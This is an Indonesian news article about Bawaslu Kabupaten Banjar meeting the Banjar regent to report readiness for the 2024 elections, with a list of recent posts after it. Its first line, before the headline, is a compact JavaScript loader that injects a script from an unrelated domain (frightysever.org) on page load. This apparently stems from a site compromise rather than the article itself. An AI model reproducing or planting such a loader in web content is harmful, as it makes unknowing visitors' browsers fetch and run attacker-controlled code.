(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Sampaikan Kesiapan Pemilu dan Pilkada Bawaslu Banjar Audiensi ke Bupati


KANALKALIMANTAN.COM, MARTAPURA – Badan Pengawas Pemilihan Umum (Bawaslu) Kabupaten Banjar melakukan audiensi dengan Bupati Banjar H Saidi Mansyur, di Mahligai Sultan Adam, Martapura, Senin (18/9/2023) pagi.

Kegiatan itu dilakukan guna menyampaikan informasi mengenai kesiapan dalam menghadapi Pemilu dan Pilkada 2024.

Audiensi itu dipimpin Ketua Bawaslu Kabupaten Banjar Muhammad Hafizh Ridha dan dihadiri Asisten Bidang Pemerintahan dan Kesra H Masruri serta Kepala Kesbangpol Banjar Safrin Noor.

Baca juga: Tiga Bupati di Kalsel Masa Jabatan Berakhir, Ini Nama Pejabat Pengisi Posisi

Muhammad Hafizh Ridha menjelaskan, maksud dari silaturahmi adalah memaparkan langkah dan kegiatan Bawaslu dalam tahapan persiapan Pemilu 2024 serta memberikan laporan kegiatan persidangan perihal administrasi beberapa waktu lalu.

Hal tersebut diakui karena adanya missinformasi pada peserta Pemilu 2024, namun semuanya sudah dapat diselesaikan secara baik.

“Tentunya diharapkan pemerintah daerah dapat mensuport semua kegiatan kita, agar Pemilu 2024 berlangsung aman, damai sesuai dengan apa yang telah dideklarasikan bersama” ujar Hafizh.

Baca juga: Pakai Aplikasi Srikandi, Gubernur Kalsel Sebut Ada Sanksi Jika Tak Diterapkan

Dia menambahkan, terkait Alat Peraga Kampanye (APK) akan ditertibkan pada 28 November 2023, dimana saat ini hal tersebut masih dalam kebijakan pemerintah daerah, apakah nantinya termasuk dalam Perda dan kemungkinan besar keberadaan APK tersebut masuk pada ranah iklan dan harusnya ada retribusi bagi pemerintah daerah.

“Semoga pada pelaksanaan pesta demokrasi nanti baik itu peserta, partai politik dan semua pihak mengikuti aturan yang sudah ada sesuai perundangan sebagaimana Undang Undang Nomor 7 Tahun 2017, agar semua hajat kita di 2024 berlangsung aman dan damai,” harap dia.

Khusus untuk peserta parpol dalam berkampanye bisa menghilangkan hal-hal yang bisa menjadikannya catatan negatif jangan sampai terjadi masalah-masalah.

Baca juga: Pembasahan Berulang di Area Ring 1 Karhutla Banjarbaru

”Secara prinsip Bawaslu Kabupaten Banjar akan melakukan pengawasan pada tahapan jalannya kegiatan pesta demokrasi ini ” pungkas dia. (kanalkalimantan.com/diskominfobanjar/kk)

Editor: Dhani


Muhammad Andi

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

9 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

9 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

9 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

10 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

10 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

10 jam ago

This website uses cookies.